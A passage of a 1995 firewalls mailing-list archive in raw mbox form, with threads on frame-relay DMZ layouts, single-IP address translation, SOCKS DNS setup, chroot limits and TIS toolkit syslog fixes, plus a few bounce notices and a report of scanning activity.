Sun, 3 Sep 95 22:03 MET DST X-Sender: maass@odb.rhein-main.de Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 3 Sep 1995 22:10:23 +0200 To: "Roy Schonberg (919) 541-6084" From: maass@thinkfish.rhein-main.de (Joerg Maass) Subject: Re: Digital Firewall for Ultrix Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Roy, >Anyone know anything about this product? > >Other than one SPD from DEC I can't seem to find out much about how it works or >how well. This is a product made up of a software/consultancy bundle plus documentation and training. A turnkey solution, basically. It comes in several possible configurations, depending on your requirements. Additional services are available. Mail me at Joerg.Maass@frs.mts.dec.com for more info. Kind regards Josch -- Am Tiergarten 22 Tel.: +49/69/4990880 D-60316 Frankfurt Fax : +49/6103/383-157 Germany privat: maass@thinkfish.rhein-main.de biz.: Joerg.Maass@frs.mts.dec.com PGP signature available upon request. From firewalls-owner Sun Sep 3 14:00:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08827 for firewalls-outgoing; Sun, 3 Sep 1995 13:51:33 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA08820 for ; Sun, 3 Sep 1995 13:51:29 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa17275; 3 Sep 95 21:10 +0100 Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa09758; 3 Sep 95 21:08 +0100 Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id VAA24588; Sun, 3 Sep 1995 21:10:52 +0100 From: Karl Strickland Message-Id: <199509032010.VAA24588@bagpuss.demon.co.uk> Subject: Re: syslog overruns and TIS smap To: Julian Assange Date: Sun, 3 Sep 1995 21:10:52 +0100 (BST) Cc: dtynan@fws.ilo.dec.com, firewalls@greatcircle.com In-Reply-To: <199508312008.GAA17374@suburbia.net> from "Julian Assange" at Sep 1, 95 06:08:01 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1215 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > > > Julian Assange wrote: > > > > > > What happens if I mknod a new hd block device within the chrooted area under > > > TIS? > > > > You'd need 'root' permission to do that. You don't need root to make > > an inbound connection to an inside host, however. > > - Der > > True, but but obtaining root isn't necessarily such a hard thing to do. My > point is that a number of people have stated that despite obtaining root in > a chrooted() enviroment your still protected. The way I have seen chroot() > calls implimented is the kernel merely sets the processes root inode to > the inode of the directory passed as the argument. If this is the only > protection involved you can break out with a mknod. You're quite right. On BSD4.4, you can bump up your security level so that sensitive devices such as mounted disks & /dev/kmem cannot be opened for write. But - as you say - without that, you're screwed. -- ------------------------------------------+----------------------------------- Mailed using ELM on FreeBSD | Karl Strickland PGP 2.3a Public Key Available. | Internet: karl@bagpuss.demon.co.uk | From firewalls-owner Sun Sep 3 14:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09125 for firewalls-outgoing; Sun, 3 Sep 1995 14:16:58 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA09118 for ; Sun, 3 Sep 1995 14:16:55 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA20292; Sun, 3 Sep 95 17:16:10 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9509032216.AA20292@hawksbill.sprintmrn.com> Subject: Re: Frame-Relay Net Connections To: mculver@ncelec.com (Mike Culver-Support) Date: Sun, 3 Sep 1995 17:16:09 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9509022139.ZM5494@ncelec.com> from "Mike Culver-Support" at Sep 2, 95 09:39:21 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1016 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > We all know (and some of us even agree) that a bastion host on a DMZ is the > best way to protect yourself from the net. > > Anyone have a suggestion for sites that connect to their service provider via a > Frame Relay connection? In this case, there is a virtual circuit to the service > provider, but the circuit runs thru a common interface on a router that also > serves WAN sites that are oart of the internal network. > It shouldn't be, that's for sure. :-) there is absolutely no reason to forsake any amount of security for frame-relay; it should should interface with your network in the same manner as any private line, in this case. - paul _______________________________________________________________________________ Paul Ferguson Dulcius Ex Asperis US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Sun Sep 3 15:00:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA09740 for firewalls-outgoing; Sun, 3 Sep 1995 14:43:51 -0700 Received: from gate.demon.co.uk (gate.demon.co.uk [158.152.1.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA09733 for ; Sun, 3 Sep 1995 14:43:47 -0700 Received: from bagpuss.demon.co.uk by gate.demon.co.uk id aa25571; 2 Sep 95 2:31 GMT-60:00 Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id CAA11087; Sat, 2 Sep 1995 02:30:38 +0100 From: Karl Strickland Message-Id: <199509020130.CAA11087@bagpuss.demon.co.uk> Subject: Re: linux vs. *bsd for secure networking system To: Paul McMahan Date: Sat, 2 Sep 1995 02:30:38 +0100 (BST) Cc: firewalls@greatcircle.com In-Reply-To: <199509012356.TAA11927@rudolph.cs.utk.edu> from "Paul McMahan" at Sep 1, 95 07:56:54 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1004 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hello, > > I know that the linux vs. (free|net)bsd question is the subject of > ongoing debates outside the realm of firewalls, but I'm interested > specifically in the security aspects of these operating systems. Remember, if you go for Linux, you have to decide *which* linux to go for - there are at least 7 different distributions - some of which are very different. And then, when a hole is discovered, you have to find patches that work with your obscure distribution & version. FreeBSD has controlled releases, and is developed in a controlled, structured manner; all security-related changes to the system must undergo peer review before a commit is made. This alone would put FreeBSD higher up my list. -- ------------------------------------------+----------------------------------- Mailed using ELM on FreeBSD | Karl Strickland PGP 2.3a Public Key Available. | Internet: karl@bagpuss.demon.co.uk | From firewalls-owner Sun Sep 3 23:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA19472 for firewalls-outgoing; Sun, 3 Sep 1995 22:33:27 -0700 Received: from jpmgate1.jpmorgan.com (jpmorgan.jpmorgan.com [146.149.99.127]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA19465 for ; Sun, 3 Sep 1995 22:33:24 -0700 Received: from tcpg01a.ny.jpmorgan.com by jpmgate1.jpmorgan.com (8.6.12/fma-120691.2); id BAA10453; Mon, 4 Sep 1995 01:32:05 -0400 Received: from smtpgwprod.ny.jpmorgan.com (smtpgwprod.ny.jpmorgan.com [146.149.86.21]) by tcpg01a.ny.jpmorgan.com (8.6.10/8.6.12) with SMTP id BAA17918 for ; Mon, 4 Sep 1995 01:31:57 -0400 Message-ID: Date: 4 Sep 1995 01:32:20 U From: "NY Global UNIX GW" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.1 Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #513 Sent: Sun, Sep 3, 1995 1:09 AM To: Rattray, A. On Server: NY Support (L-Z) Date: Mon, Sep 4, 1995 1:32 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Mon Sep 4 00:30:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA20981 for firewalls-outgoing; Mon, 4 Sep 1995 00:14:59 -0700 Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA20964 for ; Mon, 4 Sep 1995 00:14:55 -0700 Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA24396 for Firewalls@greatcircle.com; Mon, 4 Sep 95 02:35:54 -0400 Apparently-To: Message-Id: Date: 4 Sep 1995 01:44:39 U From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #513 Sent: Sun, Sep 3, 1995 1:36 AM To: Harris Tom On Server: PRC Bellevue NE MS Date: Mon, Sep 4, 1995 1:44 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Mon Sep 4 07:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04477 for firewalls-outgoing; Mon, 4 Sep 1995 07:24:29 -0700 Received: from blkbox.com (blkbox.com [198.64.53.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04470 for ; Mon, 4 Sep 1995 07:24:25 -0700 From: wyer@telecheck.com Received: from TeleCheck.com by blkbox.COM id aa03015; 4 Sep 95 9:20 CDT Received: from localhost by TeleCheck.com; (5.65/1.1.8.2/01Apr95-0611PM) id AA22869; Mon, 4 Sep 1995 09:21:43 -0500 Message-Id: <9509041421.AA22869@TeleCheck.com> X-Mailer: exmh version 1.6.2 7/18/95 To: firewalls@greatcircle.com Cc: wyer@telecheck.com Subject: Re: Frame-Relay Net Connections In-Reply-To: paul@hawksbill.sprintmrn.com's message of Sun, 03 Sep 95 17:16:09 -0500. <9509032216.AA20292@hawksbill.sprintmrn.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 04 Sep 95 09:21:43 -0500 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> paul@hawksbill.sprintmrn.com supposedly said: > > > > > We all know (and some of us even agree) that a bastion host on a DMZ is th e > > best way to protect yourself from the net. > > > > Anyone have a suggestion for sites that connect to their service provider via a > > Frame Relay connection? In this case, there is a virtual circuit to the se rvice > > provider, but the circuit runs thru a common interface on a router that al so > > serves WAN sites that are oart of the internal network. > > > > It shouldn't be, that's for sure. :-) > > there is absolutely no reason to forsake any amount of security for > frame-relay; it should should interface with your network in the same > manner as any private line, in this case. > > - paul -------------------- A fairly easy and functional solution, if you have the hardware, is to use Frame Relay switching. For the link that we're bringing up, I simply routed the inbound PVC from our Sprintnet link back out another serial port on our router, through a Synch Modem Eliminator and into a dedicated router. This accomplishes two of our goals: 1. Provide a throttle for Internet traffic by adjusting speed on Modem Eliminator 2. Prevent access to primary Frame Relay router from the internet. We accomplished this with Cisco routers plugged in back-to-back and the frame-relay route command. +--------------------------------------+--------------------------------------+ | Brett Wyer | snail: 5251 Westheimer Road | | Manager, Systems Support | 5th Floor | | TeleCheck International, Inc. | Houston, TX 77056 | | (713) 439-6474 | i-net: wyer@TeleCheck.com | +--------------------------------------+--------------------------------------+ | Stated opinions are my own and do not in any way reflect the opinion of my | | employer. | +-----------------------------------------------------------------------------+ From firewalls-owner Mon Sep 4 16:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA11607 for firewalls-outgoing; Mon, 4 Sep 1995 16:05:15 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA11466 for ; Mon, 4 Sep 1995 16:04:55 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfui12240; Mon, 4 Sep 1995 19:03:31 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA19584; Mon, 4 Sep 95 18:56:00 EDT Date: Mon, 4 Sep 1995 18:55:58 -0400 (EDT) From: Sick Puppy Subject: Nasty hackerz having busy weekend To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There are presently some dudes (quite possibly nasty hackerz) in 198.6.1.1, CACHE00.NS.UU.NET, who are doing what looks like slow Satan scans of a variety of different systems on the Internet, including some firewalls. The probes vary from 20 seconds apart to about one minute apart. They have been having a very busy weekend. I respectfully suggest that you firewalls dudes check your logs and look very carefully for possible intrusions. I wanted to be holier than thou and bark at UU.net but I can't find a phone number for them. So I am going to send this mail then pee on a tree. Sorry if this doesn't follow netiquette, but I don't know about that cause I am only a dawg. Sick Puppy, the Cat_Eating_Dawg SniffMeister of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Mon Sep 4 19:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA14090 for firewalls-outgoing; Mon, 4 Sep 1995 18:45:53 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA14083 for ; Mon, 4 Sep 1995 18:45:49 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfus20461; Mon, 4 Sep 1995 21:44:28 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA22596; Mon, 4 Sep 95 21:36:58 EDT Date: Mon, 4 Sep 1995 21:36:57 -0400 (EDT) From: Sick Puppy Subject: Re: Nasty hackerz having busy weekend To: firewalls@GreatCircle.com In-Reply-To: <9509050054.AA05445@tis.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My sniff and a lick to all those who responded so promptly to a yelp for help. You can scratch real good if you know where the fleas are. The appropriate d00dz have now been informed. Sick Puppy, the Cat_Eating_Dawg clueless country dawg -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Mon Sep 4 23:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA18014 for firewalls-outgoing; Mon, 4 Sep 1995 23:21:03 -0700 Received: from arl-img-5.compuserve.com (arl-img-5.compuserve.com [198.4.7.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA18007 for ; Mon, 4 Sep 1995 23:21:01 -0700 Received: by arl-img-5.compuserve.com (8.6.10/5.950515) id CAA16104; Tue, 5 Sep 1995 02:19:30 -0400 Date: 05 Sep 95 02:17:35 EDT From: "matt (IEZ AG)" <100632.1345@compuserve.com> To: firewalls-mailing-list Subject: firewall with only one IP address ??? Message-ID: <950905061735_100632.1345_BHL70-1@CompuServe.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, we have one question: Our firm now wants to connect to the internet, but we will get only one official IP-address. First, we believed this would be no problem because we'll use the 10.0.0.0 net as our internal network and we will be able to manage the connections over proxies. So we hoped a firewall could do two things: protect our privat network and connect every internal host against the internet. But unfortunatly, our router just needs our only official IP-address, and the firewall can only get a 10.x.y.z address. The problem is that the firewall behind the router cannot perform the connection between internet and our private net because it isn't available directly from the internet, or are we wrong? Is there another possibility to install the proxies? Ok, we could use a LINUX workstation both as the router and application gateway, but we're not very happy with this idea for several reasons. First we'll try to ask you, does anyone has any other good idea? TIA rolf matt From firewalls-owner Tue Sep 5 00:32:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA18644 for firewalls-outgoing; Tue, 5 Sep 1995 00:29:40 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA18637 for ; Tue, 5 Sep 1995 00:29:35 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id RAA06677; Tue, 5 Sep 1995 17:23:16 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma006673; Tue Sep 5 17:23:06 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA12116; Tue, 5 Sep 1995 17:28:38 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9509050728.AA12116@citecub.citec.qld.gov.au> Subject: Re: firewall with only one IP address ??? To: 100632.1345@compuserve.com (matt) Date: Tue, 5 Sep 95 17:28:36 EST Cc: firewalls@greatcircle.com In-Reply-To: <950905061735_100632.1345_BHL70-1@CompuServe.COM>; from "matt" at Sep 5, 95 2:17 am X-Mailer: ELM [version 2.3 PL11] content-length: 1343 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Hi all, > > we have one question: > Our firm now wants to connect to the internet, but we will get only > one official IP-address. First, we believed this would be no problem > because we'll use the 10.0.0.0 net as our internal network and we > will be able to manage the connections over proxies. > So we hoped a firewall could do two things: protect our privat network > and connect every internal host against the internet. > But unfortunatly, our router just needs our only official > IP-address, and the firewall can only get a 10.x.y.z address. This should not be required. Your ISP should provide an IP address for the link from their router to yours. Then you use your allocated IP on the firewall net and the 10.*.*.* behind the bastion. A picture: Assume: ISP uses net a.b.c for connections You have been allocated f.g.h Single homed bastion ISP network ------------------- | | ISP router a.b.c.d | | | | a.b.c.e Your router f.g.h.1 | | f.g.h net ------------------ | | | | f.g.h.2 f.g.h.3 bastion router 10.0.0.1 | | V inside net Of course there are many ways to build your firewall but none of them should require you to use your allocated net on the ISP-side of your router. Colin From firewalls-owner Tue Sep 5 02:00:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19667 for firewalls-outgoing; Tue, 5 Sep 1995 01:37:38 -0700 Received: from virgo.ai.net (virgo.ai.net [198.69.44.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA19658 for ; Tue, 5 Sep 1995 01:37:31 -0700 Received: from aries.ai.net (aries.ai.net [198.69.44.1]) by virgo.ai.net (8.6.11/8.6.12) with ESMTP id EAA17660; Tue, 5 Sep 1995 04:53:39 -0400 Received: (from nc@localhost) by aries.ai.net (8.6.11/8.6.12) id EAA14904; Tue, 5 Sep 1995 04:35:42 -0400 Date: Tue, 5 Sep 1995 04:35:42 -0400 (EDT) From: Network Coordinator To: Colin Campbell cc: matt <100632.1345@compuserve.com>, firewalls@GreatCircle.COM Subject: Re: firewall with only one IP address ??? In-Reply-To: <9509050728.AA12116@citecub.citec.qld.gov.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Of course there are many ways to build your firewall but none of them > should require you to use your allocated net on the ISP-side of your > router. I think the gentleman is saying that he has only *1* IP Address. Not an IP net. -Jerry. From firewalls-owner Tue Sep 5 05:00:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA21633 for firewalls-outgoing; Tue, 5 Sep 1995 04:39:16 -0700 Received: from victoria.schnet.edu.au (victoria.schnet.edu.au [203.2.135.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA21626 for ; Tue, 5 Sep 1995 04:39:11 -0700 Received: (from lukeh@localhost) by victoria.schnet.edu.au (8.6.9/8.6.9) id VAA23596 for firewalls@greatcircle.com; Tue, 5 Sep 1995 21:37:39 +1000 Date: Tue, 5 Sep 1995 21:37:39 +1000 From: Luke Howard Message-Id: <199509051137.VAA23596@victoria.schnet.edu.au> To: firewalls@greatcircle.com Subject: syslog() and TIS on Nextstep Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was wondering if anyone has had any experience compiling the firewall toolkit under Nextstep (not an ideal platform for this kinda stuff I know, but we're using it for reasons outside my control). I've managed to get it to compile, after changing a couple of things in Makefile.config and firewall.h, and it appears to work fine. I'm not sure to what extent Nextstep is vulnerable to the syslog() problem - I tried one of the few programs floating around that tests for the vulnerability, and I get seg. faults when 8k or more is passed to it. (NS3.3 on i486) I modified smap.c to not accept to/from lines >1024 bytes, and I linked the entire toolkit against newlog-1.0, which supposedly does bounds checking on syslog() - getting it to compile on Nextstep was a bit awkward (had to grab sys/cdefs.h off FreeBSD, define STDERR_FILENO or something I can't quite remember :)) but it (again) appears to be working fine. Does anyone have any comments on this? I'm admiteddly a newbie when it comes to C :) regards, luke. From firewalls-owner Tue Sep 5 06:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA22196 for firewalls-outgoing; Tue, 5 Sep 1995 05:41:00 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA22182 for ; Tue, 5 Sep 1995 05:40:56 -0700 Received: from cdgco6.cdg-co.FR.DHL.COM by gateway1.DHL.COM id aa19784; 5 Sep 95 5:39 PDT Received: from cdgco4.cdg-co.fr.DHL.COM by cdgco6.cdg-co.fr.DHL.COM with SMTP (DHLGMS 4.07-DSI) id AA199314697; Tue, 5 Sep 1995 14:38:17 +0200 Received: by cdgco4.cdg-co.fr.DHL.COM (DHLGMS 4.07-DSI) id AA29572; Tue, 5 Sep 1995 14:39:17 +0200 Message-Id: <9509051239.AA29572@cdgco4.cdg-co.fr.DHL.COM> From: Pascal MELCHIOR Date: Tue, 5 Sep 1995 14:39:17 +0200 To: firewalls@greatcircle.com Subject: USING SOCKS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk %UNIPLEX %TO firewalls@greatcircle.com %FROM pmelchio %SYSTEM DHLNET %SUBJECT USING SOCKS %VERIFY y %REGISTERED y %DATE 05/09/95 14:39 %REFERENCE 345634 OBJECT: using SOCKS We have some PC with a Netscape client, and we want to use The SOCKS software on a HPUX machine.~ Is it possible to mask the name of the DNS server to the client PC, if I define this line in the include/socks.h file :~ #define SOCKS_DEFAULT_NS "a.b.c.d" ? The PCs have a resolv.cfg file without the global DNS server, they can resolve only our own machines.~ See the picture : .... .... .... . . . . . . .... .... .... . . . . . . ........................................................ PC SOCKS SERVER DNS SERVER ip = a.b.c.d The PC has A SOCKS server configuration.~ The SOCKS server is compiled with #define SOCKS_DEFAULT_NS "a.b.c.d" in the include/socks.h. Is it possible for the PC to resolve an ip address in this configuration ?~ If it is not, for which kind of configuration the SOCKS_DEFAULT_NS is necessary ? Thanks for your cooperation ----------------------------------------- | Pascal MELCHIOR | | E-mail: pmelchio@cdg-co.fr.DHL.COM | ----------------------------------------- %UEND From firewalls-owner Tue Sep 5 07:30:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA23904 for firewalls-outgoing; Tue, 5 Sep 1995 07:07:21 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA23897 for ; Tue, 5 Sep 1995 07:07:16 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id JAA08657; Tue, 5 Sep 1995 09:06:52 -0500 Date: Tue, 5 Sep 1995 09:06:49 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Paul Ferguson cc: Mike Culver-Support , firewalls@greatcircle.com Subject: Re: Frame-Relay Net Connections In-Reply-To: <9509032216.AA20292@hawksbill.sprintmrn.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't think Mike's original question was understood: He wants to build a bastion-host firewall, possibly at his headquarters location. His problem is that he has one frame relay interface at this site, multiple PVCs of which most go to other company sites, and one PVC built to communicate with the public Internet. Because all of these logical circuits are bundled on one physical cable, its kind of difficult for Mike to plug his bastion host in the middle. The question didn't relate to the security level of frame relay--just how the heck do you plugumitz together. Mike, I think you are going to have to break down and purchase an additional router interface--perhaps even another router if you want a firewall with two routers and a DMZ between them. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 From firewalls-owner Tue Sep 5 07:32:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA23894 for firewalls-outgoing; Tue, 5 Sep 1995 07:07:10 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA23886 for ; Tue, 5 Sep 1995 07:07:07 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id JAA19926; Tue, 5 Sep 1995 09:03:54 -0500 Message-Id: <199509051403.JAA19926@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 05 Sep 1995 09:14:13 -0500 To: "matt (IEZ AG)" <100632.1345@compuserve.com>, firewalls-mailing-list From: lpierce@intex.net (S. Lane Pierce) Subject: Re: firewall with only one IP address ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matt- Are you sure you only get 1 host address or 1 network address? Usually 1 class c network address is assigned, this will yield 254 host addresses. Your outside router and any host on the DMZ (ones that you want directly accessable from the Internet) must have a "NIC sanctioned" ip. Check with your provider. Good luck. At 02:17 AM 9/5/95 EDT, matt (IEZ AG) wrote: >Hi all, > >we have one question: >Our firm now wants to connect to the internet, but we will get only >one official IP-address. First, we believed this would be no problem >because we'll use the 10.0.0.0 net as our internal network and we >will be able to manage the connections over proxies. >So we hoped a firewall could do two things: protect our privat network >and connect every internal host against the internet. >But unfortunatly, our router just needs our only official >IP-address, and the firewall can only get a 10.x.y.z address. >The problem is that the firewall behind the router cannot perform >the connection between internet and our private net because it isn't >available directly from the internet, or are we wrong? >Is there another possibility to install the proxies? >Ok, we could use a LINUX workstation both as the router and application >gateway, but we're not very happy with this idea for several reasons. >First we'll try to ask you, does anyone has any other good idea? [.sig snipped] S. Lane Pierce lpierce@intex.net From firewalls-owner Tue Sep 5 07:48:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24224 for firewalls-outgoing; Tue, 5 Sep 1995 07:17:06 -0700 Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA24217 for ; Tue, 5 Sep 1995 07:17:02 -0700 Received: from mike_pc by ncelec.com (5.4R3.10/200.2.1.5) id AA17254; Tue, 5 Sep 1995 07:12:46 -0700 Date: Tue, 5 Sep 1995 07:12:46 -0700 Message-Id: <9509051412.AA17254@ncelec.com> X-Sender: mculver@ncelec.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Frank K. Senter" From: Mike Culver Subject: Re: Frame-Relay Net Connections Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 AM 9/5/95 -0500, you wrote: >I don't think Mike's original question was understood: He wants to build >a bastion-host firewall, possibly at his headquarters location. His >problem is that he has one frame relay interface at this site, multiple >PVCs of which most go to other company sites, and one PVC built to >communicate with the public Internet. Because all of these logical >circuits are bundled on one physical cable, its kind of difficult for >Mike to plug his bastion host in the middle. The question didn't relate >to the security level of frame relay--just how the heck do you plugumitz >together. > >Mike, I think you are going to have to break down and purchase an >additional router interface--perhaps even another router if you want a >firewall with two routers and a DMZ between them. Thanks for clarifying the situation. Ain't always that easy. In this instance, one reason (though by far not the main reason) I don't want to purchase a separate line is that the local telco (US West) has been running FIVE MONTHS lead time on new circuits! From firewalls-owner Tue Sep 5 08:30:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26734 for firewalls-outgoing; Tue, 5 Sep 1995 08:24:38 -0700 Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA26727 for ; Tue, 5 Sep 1995 08:24:35 -0700 Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.28.1 #1) id m0spzpm-000Gv8C; Tue, 5 Sep 95 08:22 PDT X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 5 Sep 1995 08:24:47 -0700 To: "matt (IEZ AG)" <100632.1345@compuserve.com> From: markl@glyphic.com (Mark Lentczner) Subject: Re: firewall with only one IP address ??? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Ok, we could use a LINUX workstation both as the router and application >gateway, but we're not very happy with this idea for several reasons. I used to run our net this way: *=====+===(Ethernet)===+=====* | | Workstation(s) Linux ------(ppp)------ Big Bad Internet | Workstation(s) -----(ppp)----+ It worked fine. I had one (and only one) valid IP address. Everything on the Ethernet used "net 10". In this config, there is no need for a router, as there is NO routing. Note that the Linux box is not routing at all: All packets to/from the Internet must leave/arrive from processes on the Linux box. Linux is especially nice for this application because of the Masqurade patch option, which is sort of a kernel level appliction gateway: You can have Linux automatically renumber and forward packets to/from the internal network from/to the internet. The Internet machines think they are talking to the Linux box, but they are really connecting to the internal machines. This only works for connections established from the internal network - which is typically what you want: Your users can WWW out, but no one can WWW (or Telnet, FTP, etc...) in. I ran normal application gateway apps on Linux for a number of services as well. - Mark ------------------- Mark Lentczner Glyphic Technology 1209 Villa Street Mtn. View, CA 94041 415/964-5311 markl@glyphic.com http://www.glyphic.com/ From firewalls-owner Tue Sep 5 09:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA27959 for firewalls-outgoing; 